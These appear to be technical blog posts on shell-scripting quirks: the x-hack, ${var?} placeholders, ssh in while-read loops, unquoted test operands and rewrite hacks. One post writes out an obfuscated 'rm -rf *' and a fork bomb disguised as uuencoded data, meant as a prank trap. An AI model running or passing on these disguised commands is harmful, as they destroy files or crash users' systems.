What exactly was the point of [ “x$var” = “xval” ]?

In shell scripting you sometimes come across comparisons where each value is prefixed with "x". Here are some examples from GitHub:

if [ "x${JAVA}" = "x" ]; then
if [ "x${server_ip}" = "xlocalhost" ]; then
if test x$1 = 'x--help' ; then

I’ll call this the x-hack.

For any POSIX compliant shell, the value of the x-hack is exactly zero: this comparison works without the x 100% of the time. But why was it a thing?

Online sources like this stackoverflow Q&A are a little handwavy, saying it’s an alternative to quoting (oof), pointing towards issues with "some versions" of certain shells, or generally cautioning against the mystic behaviors of especially ancient Unix system without concrete examples.

To determine whether or not ShellCheck should warn about this, and if so, what its long form rationale should be, I decided to dig into the history of Unix with the help of The Unix Heritage Society‘s archives. I was unfortunately unable to peer into the closely guarded world of the likes of HP-UX and AIX, so dinosaur herders beware.

These are the cases I found that can fail.

Left-hand side matches a unary operator

The AT&T Unix v6 shell from 1973, at least as found in PWB/UNIX from 1977, would fail to run test commands whose left-hand side matched a unary operator. This must have been immediately obvious to anyone who tried to check for command line parameters:

% arg="-f"
% test "$arg" = "-f"
syntax error: -f
% test "x$arg" = "x-f"

This was fixed in the AT&T Unix v7 Bourne shell builtin in 1979. However, test and [ were also available as separate executables, and appear to have retained a variant of the buggy behavior:

$ arg="-f"
$ [ "$arg" = "-f" ]
$ [ "x$arg" = "x-f" ]

This happened because the utility used a simple recursive descent parser without backtracking, which gave unary operators precedence over binary operators and ignored trailing arguments.

The "modern" Bourne shell behavior was copied by the Public Domain KornShell in 1988, and made part of POSIX.2 in 1992. GNU Bash 1.14 did the same thing for its builtin [, and the GNU shellutils package that provided the external test/[ binaries followed POSIX, so the early GNU/Linux distros like SLS were not affected, nor was FreeBSD 1.0.

The x-hack is effective because no unary operators can start with x.

Either side matches string length operator -l

A similar issue that survived longer was with the string length operator -l. Unlike the normal unary predicates, this one was only parsed as part as part of an operand to binary predicates:

[ -l "$var" -gt 8 ] && echo "String is longer than 8 chars"

It did not make it into POSIX because, as the rationale puts it, "it was undocumented in most implementations, has been removed from some implementations (including System V), and the functionality is provided by the shell", referring to [ ${#var} -gt 8 ].

It was not a problem in UNIX v7 where = took precedence, but Bash 1.14 from 1996 would parse it greedily up front:

$ var="-l"
$ [ "$var" = "-l" ]
test: -l: binary operator expected
$ [ "x$var" = "x-l" ]

It was also a problem on the right-hand side, but only in nested expressions. The -l check made sure there was a second argument, so you would need an additional expression or parentheses to trigger it:

$ [ "$1" = "-l" -o 1 -eq 1 ]
[: too many arguments
$ [ "x$1" = "x-l" -o 1 -eq 1 ]

This operator was removed in Bash 2.0 later that year, eliminating the problem.

Left-hand side is !

Another issue in early shells was when the left-hand side was the negation operator !:

$ var="!"
$ [ "$var" = "!" ]
test: argument expected            (UNIX v7, 1979)
test: =: unary operator expected   (bash 1.14, 1996)
(false)                            (pd-ksh88, 1988)
$ [ "x$var" = "x!" ]

Again, the x-hack is effective by preventing the ! from being recognized as a negation operator.

ksh treated this the same as [ ! "=" ], and ignored the rest of the arguments. This quiety returned false, as = is not a null string. Ksh continues to ignore trailing arguments to this day:

$ [ -e / random words/ops here ]
(true)                              (ksh93, 2021)
bash: [: too many arguments         (bash5, 2021)

Bash 2.0 and ksh93 both fixed this problem by letting = take precedence in the 3-argument case, in accordance with POSIX.

Left-hand side is "("

This is by far my favorite.

The UNIX v7 builtin failed when the left-hand side was a left-parenthesis:

$ left="(" right="("
$ [ "$left" = "$right" ]
test: argument expected
$ [ "x$left" = "x$right" ]

This happens because the ( takes precedence over the =, and becomes an invalid parenthesis group.

Why is this my favorite? Behold Dash 0.5.4 up until 2009:

$ left="(" right="("
$ [ "$left" = "$right" ]
[: 1: closing paren expected
$ [ "x$left" = "x$right" ]

That was an active bug when the StackOverflow Q&A was posted.

But wait, there’s more!

Here’s Zsh in late 2015, right before version 5.3:

% left="(" right=")"
% [ "$left" = "$right" ]
% [ "x$left" = "x$right" ]

Amazingly, the x-hack could be used to work around certain bugs all the way up until 2015, seven years after StackOverflow wrote it off as an archaic relic of the past!

The bugs are of course increasingly hard to come across. The Zsh one only triggers when comparing left-paren against right-paren, as otherwise the parser will backtrack and figure it out.

Another late holdout was Solaris, whose /bin/sh was the legacy Bourne shell as late as Solaris 10 in 2009. However, this was undoubtedly for compatibility, and not because they believed this was a viable shell. A "standards compliant" shell had been an option for a long time before Solaris 11 dragged it kicking and screaming into 21th century — or at least into the 90s — by switching to ksh93 by default in 2011.

In all cases, the x-hack is effective because it prevents the operands from being recognized as parentheses.


The x-hack was indeed useful and effective against several real and practical problems in multiple shells.

However, the value was mostly gone by the mid-to-late 1990s, and the few remaining issues were cleaned up before 2010 — shockingly late, but still over a decade ago.

The last one managed to stay until 2015, but only in the very specific case of comparing opening parenthesis to a closed parenthesis in one specific non-system shell.

I think it’s time to retire this idiom, and ShellCheck now offers a style suggestion by default.


The Dash issue of [ "(" = ")" ] was originally reported in a form that affected both Bash 3.2.48 and Dash 0.5.4 in 2008. You can still see this on macOS bash today:

$ str="-e"
$ [ \( ! "$str" \) ]
[: 1: closing paren expected     # dash
bash: [: `)' expected, found ]   # bash

POSIX fixes all these ambiguities for up to 4 parameters, ensuring that shells conditions work the same way, everywhere, all the time.

Here’s how Dash maintainer Herbert Xu put it in the fix:

 * POSIX prescriptions: he who wrote this deserves the Nobel
 * peace prize.

${var?} and &&: Two simple tips for shell commands in tech docs

tl;dr: Use error-if-unset ${placeholders?} and join commands with && to make it easier and safer to copy-paste shell commands from technical documentation.

I frequently read documentation that includes shell commands, and copy-paste them into a shell. It might look something like this:

To install a JDK:

sudo apt-get update
sudo apt-get install openjdk-<VERSION>-jdk

Obviously this example is particularly simple and clear. A more realistic case might have several 160+ character commands invoking unfamiliar tools and utility scripts with a variety of fixed and variable parameters. To see far too many instances of this, check out your company’s internal wiki.

You, as the documentation author or editor, can improve such command listings in two simple ways.

Use ${NAME?} instead of ad-hoc placeholders like <NAME> or NAME

If I accidentally miss one of the placeholders where I was supposed to insert something, this error-if-unset POSIX compatible syntax will cause a command to fail fast with a simple and clear error message:

$ sudo apt-get install openjdk-${VERSION?}-jdk
bash: VERSION: parameter not set

(Assuming there is no existing environment variable by the same name, that is!)

Compare this to the original angle brackets, which in the best case fail somewhat obtusely:

$ sudo apt-get install openjdk-<VERSION>-jdk
bash: VERSION: No such file or directory

and otherwise, will create/truncate files while giving misleading errors (if I’m lucky enough to get one):

$ sudo apt-get install openjdk-<VERSION>-jdk
E: Unable to locate package openjdk
$ grep VERSION *
grep: invalid option -- 'j'

Here the redirection >-jdk was interpreted as a file redirection (just like in to echo Hi > foo.txt), and created a file -jdk that causes otherwise fine commands with globs to fail in unexpected ways (and imagine what would happen with grep <alias name> ~/.bashrc!)

For just an uppercase word, it can be hard to tell whether something like ID is part of the command or whether it’s a placeholder. The command will try to execute whether or not I guess correctly.

Use && between consecutive commands

I get not just one but two benefits when you use && to join multiple consecutive commands:

sudo apt-get update &&
sudo apt-get install openjdk-${VERSION?}-jdk

The first and well known one is that each command will only run if the previous ones succeeded. Instead of powering through errors and running commands from an increasingly unknown state, the shell will stop so I can get it back on track and continue correctly.

The second and more subtle benefit is that this will make the shell read all commands up front, before it starts executing any. This matters when any of the commands request input. Here’s what happens when I paste the original example:

$ sudo apt-get update
[sudo] password for vidar:
Sorry, try again.
[sudo] password for vidar:

I pasted two commands, but the first one requested a password. The second command was then read as that password, leading to the "Sorry, try again" error.

When I now enter my actual password, only the first command will run. I won’t have any further indication that one of the commands has been swallowed up.

Compare this to using &&, where the shell patiently reads all of the commands beforehand (with a continuation prompt >), and only then executes them:

$ sudo apt-get update &&
> sudo apt-get install openjdk-14-jdk
[sudo] password for vidar:

When I enter my password now, both commands will run as expected.


These simple tips, alone or together, can help make it easier for users to follow instructions involving shell commands, leading to fewer and more easily fixed mistakes. This makes their lives easier, and by extension, yours.

Tricking the tricksters with a next level fork bomb

Do not copy-paste anything from this article into your shell. You have been warned.

Some people make a cruel sport out of tricking newbies into running destructive shell commands.

Often, this takes the form of crudely obscured commands like this one, which will result in a rm -rf * being executed in the current directory, deleting everything:

$(echo cm0gLXJmICoK | base64 -d)

Years ago, I came across someone doing this, and decided to trick them back.

Now, I’m not enough of a jerk to trick anyone into deleting their files, but I’m more than willing to let wanna-be hackers fork bomb themselves.

I designed a fork bomb in such a way that even when people know it’s a destructive command, they still run it! At the risk of you doing the same, here it is:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

It looks like yet another crudely obscured command, but it’s not. It does not prey on unsuspecting newbies’ tendencies to run commands they don’t understand.

Instead, it targets people who are familiar with that kind of trick, who know it’s going to be destructive, and exploits their schadenfreude and curiosity.

For the previous command, such a person would remove the surrounding $(..) to find out what a victim would have been fooled into executing:

$ echo cm0gLXJmICoK | base64 -d
rm -rf *

But when they similarly modify this command to see what horror will befall the newbie stupid enough to run it:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

They’ll suddenly find their system slowing to a crawl until a forced reboot! As it turns out, they were the newbie all along.

You see, the eval (…dramatic pause…) was a decoy!

In fact, the uudecode, echo and $(..) were all just part of the act. They’re purely for misdirection, and don’t serve any functional purpose.

No decoding, execution or evaluation is required for the bomb to explode. Instead it’s set off by the simple expansion, in any context, of this argument:


Even most of this string is just for show, designed to make it look more like uuencoded data. Here it is with all the arbitrary characters replaced with underscores:


And here it’s written more cleanly:

" `r() ( r & r ); r` "

Now it’s your bog standard fork bomb in a command expansion.

I went through a few iterations designing this trap. The first one was this:

eval $(echo 'a2Vrf3xvcml'\ZW%3t`r()(r|r);r`2'6a2VrZQo=' | base64 -d)

It has the same basic form, but several problems:

  • Base64 is pretty well known, and this clearly isn’t it
  • It’s quite obvious from the quotes that the literal string stops and starts
  • The fork bomb, r()(r|r);r really sticks out

base64 is almost entirely alphanumeric, e.g. bW9yZSBnYXJiYWdlIGhlcmUK, while uuencoded data (if you can even remember what it looks like), has a bunch of symbols that would obscure any embedded shell code: 1<V]M92!G87)B86=E(&AE<F4`. I broke up the long gibberish base64-ish strings with symbols to match.

For the quotes, I shoved it in simple double quotes and hoped no one would notice the amount of questionable characters put in an interpolated string.

For the bomb itself, I wanted to find a way to insert more gibberish, but without adding any spaces that attract the eyes. Making the string r longer would work, but the repetition would be noticeable.

The fix I ended up with was using brace expansion: foo.{jpg,png} expands to foo.jpg foo.png, and r{,foo} expands to r foo. This invokes r with an argument that the function ignores.

The second version was this:

eval $(echo "I<RA('1E<W3t`p&r()(rofl&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

The idea here was that rofl would be executed on every fork, filling the screen with “rofl: command not found” for some extra finesse, but I figured that such a recognizable word would attract attention and further scrutiny.

In the end, I arrived at the final version, and it was quite effective. Several people involved in the noob sniping sheepishly admitted that they fell for it.

I essentially forgot about it, but other people apparently didn’t. About a year later someone asked about it on SuperUser, where you can find an even better analysis.

And now you have the backstory as well.

Buffers and windows: The mystery of ‘ssh’ and ‘while read’ in excessive detail

If you’ve ever tried to use ssh, and similarly ffmpeg or mplayer, in a while read loop, you’ll have stumbled upon a surprising interaction: the loop mysteriously aborts after the first iteration!

The solution, using ssh -n or ssh < /dev/null, is quickly spoiled by ShellCheck (shellcheck this code online), but why stop there? Let’s take a deep dive into the technical details surrounding this issue.

Note that all numbers given here are highly tool and platform specific. They apply to GNU coreutils 8.26, Linux 4.9 and OpenSSH 7.4, as found on Debian in July, 2017. If you use a different platform, or even just sufficiently newer versions, and wish to repeat the experiments, you may have to follow the reasoning and update the numbers accordingly.

Anyways, to first demonstrate the problem, here’s a while read loop that runs a command for each line in a file:

while IFS= read -r host
  echo ssh "$host" uptime
done < hostlist.txt

It works perfectly and iterates over all lines in the file:

ssh localhost uptime
ssh uptime
ssh uptime

However, if we remove the echo and actually run ssh, it will stop after the first iteration with no warnings or errors:

 16:12:41 up 21 days,  4:24, 12 users,  load average: 0.00, 0.00, 0.00

Even uptime itself works fine, but ssh localhost uptime will stop after the first one, even though it runs the same command on the same machine.

Of course, applying the aforementioned fix, ssh -n or ssh < /dev/null solves the problem and gives the expected result:

16:14:11 up 21 days,  4:24, 12 users,  load average: 0.00, 0.00, 0.00
16:14:11 up 14 days,  6:59, 15 users,  load average: 0.00, 0.00, 0.00
01:14:13 up 73 days, 13:17,  8 users,  load average: 0.08, 0.15, 0.11

If we merely wanted to fix the problem though, we'd just have followed ShellCheck's advice from the start. Let's keep digging.

You see similar behavior if you try to use ffmpeg to convert media or mplayer to play it. However, now it's even worse: not only does it stop after one iteration, it may abort in the middle of the first one!

All other commands work fine -- even other converters, players and ssh-based commands like sox, vlc and scp. Why do certain commands fail?

The root of the problem is that when you pipe or redirect to a while read loop, you're not just redirecting to read but to the entire loop body. Everything in both condition and body will share the same file descriptor for standard input. Consider this loop:

while IFS= read -r line
  cat > rest
done < file.txt

First read will successfully read a line and start the first iteration. Then cat will read from the same input source, where read left off. It reads until EOF and exits, and the loop iterates. read again tries to read from the same input, which remains at EOF. This terminates the loop. In effect, the loop only iterated once.

The question remains, though: why do our three commands in particular drain stdin?

ffmpeg and mplayer are simple cases. They both accept keyboard controls from stdin.

While ffmpeg encodes a video, you can use '+' to make the process more verbose or 'c' to input filter commands. While mplayer plays a video, you can use 'space' to pause or 'm' to mute. The commands drain stdin while processing these keystrokes.

They both also share a shortcut to quit: they will stop abruptly if any of the input they read is a "q".

But why ssh? Shouldn't it mirror the behavior of the remote command? If uptime doesn't read anything, why should ssh localhost uptime?

The Unix process model has no good way to detect when a process wants input. Instead, ssh has to preemptively read data, send it over the wire, and have sshd offer it on a pipe to the process. If the process doesn't want it, there's no way to return the data to the FD from whence it came.

We get a toy version of the same problem with cat | uptime. Output in this case is the same as when using ssh localhost uptime:

 16:25:51 up 21 days,  4:34, 12 users,  load average: 0.16, 0.03, 0.01

In this case, cat will read from stdin and write to the pipe until the pipe's buffer is full, at which time it'll block until something reads. Using strace, we can see that GNU cat from coreutils 8.26 uses a 128KiB buffer -- more than Linux's current 64KiB pipe buffer -- so one 128KiB buffer is the amount of data we can expect to lose.

This implies that the loop doesn't actually abort. It will continue if there is still data left after 128KiB has been read from it. Let's try that:

  echo first
  for ((i=0; i < 16384; i++)); do echo "garbage"; done
  echo "second"
} > file

while IFS= read -r line
  echo "Read $line"
  cat | uptime > /dev/null
done < file

Here, we write 16386 lines to the file. "first", 16384 lines of "garbage", followed by "second". "garbage" + linefeed is 8 bytes, so 16384 of them make up exactly 128KiB. The file prevents any race conditions between producer and consumer.

Here's what we get:

Read first
Read second

If we add a single line additional line of "garbage", we'll see that instead. If we write one less, "second" disappears. In other words, the expected 128KiB of data were lost between iterations.

ssh has to do the same thing, but more: it has to read input, encrypt it, and transmit it over the wire. On the other side, sshd receives it, decrypts it, and feeds it into the pipe. Both sides work asynchronously in duplex mode, and one side can shut down the channel at any time.

If we use ssh localhost uptime we're racing to see how much data we can push before sshd notifies us that the command has already exited. The faster the computer and slower the roundtrip time, the more we can write. To avoid this and ensure deterministic results, we'll use sleep 5 instead of uptime from now on.

Here's one way of measuring how much data we write:

$ tee >(wc -c >&2) < /dev/zero | { sleep 5; }

Of course, by showing how much it writes, it doesn't directly show how much sleep reads: the 65536 bytes here is the Linux pipe buffer size.

This is also not a general way to get exact measurements because it relies on buffers aligning perfectly. If nothing is reading from the pipe, you can successfully write two blocks of 32768 bytes, but only one block of 32769.

Fortunately, GNU tee currently uses a buffer size of 8192, so given 8 full reads, it will perfectly fill the 65536 byte pipe buffer. strace also reveals that ssh (OpenSSH 7.4) uses a buffer size of 16384, which is exactly 2x of tee and 1/4x of the pipe buffer, so they will all align nicely and give an accurate count.

Let's try it with ssh:

$ tee >(wc -c >&2) < /dev/zero | ssh localhost sleep 5

As discussed, we'll subtract the pipe buffer, so we can surmise that 2162688 bytes has been read by ssh. We can verify this manually with strace if we want. But why 2162688?

On the other side, sshd has to feed this data into sleep through a pipe with no readers. That's another 65536. We're now left with 2097152 bytes. How can we account for these?

This number is in fact the OpenSSH transport layer's default window size for non-interactive channels!

Here's an excerpt from channels.h in the OpenSSH source code:

/* default window/packet sizes for tcp/x11-fwd-channel */
#define CHAN_SES_PACKET_DEFAULT	(32*1024)

There it is: 64*32*1024 = 2097152.

If we adapt our previous example to use ssh anyhost sleep 5 and write "garbage"
(64*32*1024+65536)/8 = 270336 times, we can again game the buffers and cause our iterator to get exactly the lines we want:

  echo first
  for ((i=0; i < $(( (64*32*1024 + 65536) / 8)); i++)); do echo "garbage"; done
  echo "second"
} > file

while IFS= read -r line
  echo "Read $line"
  ssh localhost sleep 5
done < file

Again, this results in:

Read first
Read second

An entirely useless experiment of course, but pretty nifty!

[ -z $var ] works unreasonably well

There is a subreddit /r/nononoyes for videos of things that look like they’ll go horribly wrong, but amazingly turn out ok.

[ -z $var ] would belong there.

It’s a bash statement that tries to check whether the variable is empty, but it’s missing quotes. Most of the time, when dealing with variables that can be empty, this is a disaster.

Consider its opposite, [ -n $var ], for checking whether the variable is non-empty. With the same quoting bug, it becomes completely unusable:

Input Expected [ -n $var ]
“” False True!
“foo” True True
“foo bar” True False!

These issues are due to a combination of word splitting and the fact that [ is not shell syntax but traditionally just an external binary with a funny name. See my previous post Why Bash is like that: Pseudo-syntax for more on that.

The evaluation of [ is defined in terms of the number of argument. The argument values have much less to do with it. Ignoring negation, here’s a simplified excerpt from POSIX test:

# Arguments Action Typical example
0 False [ ]
1 True if $1 is non-empty [ "$var" ]
2 Apply unary operator $1 to $2 [ -x "/bin/ls" ]
3 Apply binary operator $2 to $1 and $3 [ 1 -lt 2 ]

Now we can see why [ -n $var ] fails in two cases:

When the variable is empty and unquoted, it’s removed, and we pass 1 argument: the literal string “-n”. Since “-n” is not an empty string, it evaluates to true when it should be false.

When the variable contains foo bar and is unquoted, it’s split into two arguments, and so we pass 3: “-n”, “foo” and “bar”. Since “foo” is not a binary operator, it evaluates to false (with an error message) when it should be true.

Now let’s have a look at [ -z $var ]:

Input Expected [ -z $var ] Actual test
“” True: is empty True 1 arg: is “-z” non-empty
“foo” False: not empty False 2 args: apply -z to foo
“foo bar” False: not empty False (error) 3 args: apply “foo’ to -z and bar

It performs a completely wrong and unexpected action for both empty strings and multiple arguments. However, both cases fail in exactly the right way!

In other words, [ -z $var ] works way better than it has any possible business doing.

This is not to say you can skip quoting of course. For “foo bar”, [ -z $var ] in bash will return the correct exit code, but prints an ugly error in the process. For ” ” (a string with only spaces), it returns true when it should be false, because the argument is removed as if empty. Bash will also incorrectly pass var="foo -o x" because it ends up being a valid test through code injection.

The moral of the story? Same as always: quote, quote quote. Even when things appear to work.

ShellCheck is aware of this difference, and you can check the code used here online. [ -n $var ] gets an angry red message, while [ -z $var ] merely gets a generic green quoting warning.

Why Bash Is Like That: Rewrite hacks

Bash can seem pretty random and weird at times, but most of what people see as quirks have very logical (if not very good) explanations behind them. This series of posts looks at some of them.

Let’s say you wanted to enforce a policy in which no files on the system could contain swearing. How would you write a script that checks it? Let’s use the word “damn”, and let’s write a script “checklanguage” that checks whether a file contains that word.

Our first version might be:

#!/usr/bin/env bash
grep -q "damn" "$@" 

The problem with this is that it triggers on itself: ./checklanguage checklanguage returns true. How can we write the script in such a way that it reliably detects the word, but doesn’t detect itself? (Think about it for a second).

There are many ways of doing this: a="da"; b="mn"; grep "$a$b", grep "da""mn", grep da\mn. All of these check for the four characters d-a-m-n in sequence, but doesn’t contain the sequence itself. These methods rely on two things being A. identical in one context (shell script) and B. different in another (plaintext).

This type of trick is the basis of three common command line hacks:

Finding processes from ps, while excluding the grep that does the filtering.

If we do a simple ps ax | grep processname, we might get output like this:

$ ps ax | grep processname
13003 pts/2    S      0:00 /bin/bash ./processname
13496 pts/4    R+     0:00 grep --color=auto processname

How do we get the same list, but without the grep process? You’ll see people wrapping the first character in square brackets:

$ ps ax | grep "[p]rocessname"
13003 pts/2    S      0:00 /bin/bash ./processname

In this case, the regex “[p]rocessname” is identical to the regex “processname”, but since they’re written differently, the latter matches itself while the former doesn’t. This means that the grep won’t match itself, and we only get the process we’re interested in (this job is better done by pgrep).

There is no syntax rule that says “if the first character is enclosed in square brackets, grep shall ignore itself in ps output”.

It’s just a logical side effect of rewriting the regex to work the same but not match itself. We could have used grep -E 'process()name' or grep -E 'proces{2}name' instead.

Running commands instead of aliases

Maybe you’re sick of Debian’s weird perl rename, and you aliased it to rename.ul instead.

$ rename -v .htm .html *
`foo.htm' -> `foo.html'

Yay, that’s way easier than writing regex! But what if we need to use the unaliased rename?

$ rename -v 's/([1-9])x([0-9]*)/S$1E$2/' *
rename.ul: not enough arguments

Instead, you’ll see people prefixing the command with a backslash:

$ \rename -v 's/([1-9])x([0-9]*)/S0$1E$2/' *
Foo_1x20.mkv renamed as Foo_S01E20.mkv

Shell aliases trigger when a command starts with a word. However, if the command starts with something that expands into a word, alias expansion does not apply. This allows us to use e.g. \ls or \git to run the command instead of the alias.

There is no syntax rule that says that “if a command is preceded by a backslash, alias expansion is ignored”.

It’s just a logical side effect of rewriting the command to work the same, but not start with a literal token that the shell will recognize as an alias. We could also have used l\s or 'ls'.

Deleting files starting with a dash

How would you go about deleting a file that starts with a dash?

$ rm -v -file
rm: invalid option -- 'l'

Instead, you’ll see people prefixing the filename with ./:

$ rm -v ./-file
removed `./-file'

A command will interpret anything that starts with a dash as a flag. However, to the file system, -file and ./-file mean exactly the same thing.

There is no syntax rule that says that “if an argument starts with ./, it shall be interpretted as a filename and not an option”.

It’s just a logical side effect of rewriting a filename to refer to the same file, but start with a different character. We could have used rm /home/me/-file or rm ../me/-file instead.

Homework: What do you tell someone who thinks that ./myscript is a perfect example of how weird UNIX is? Why would anyone design a system where the run command is “./” instead of “run”?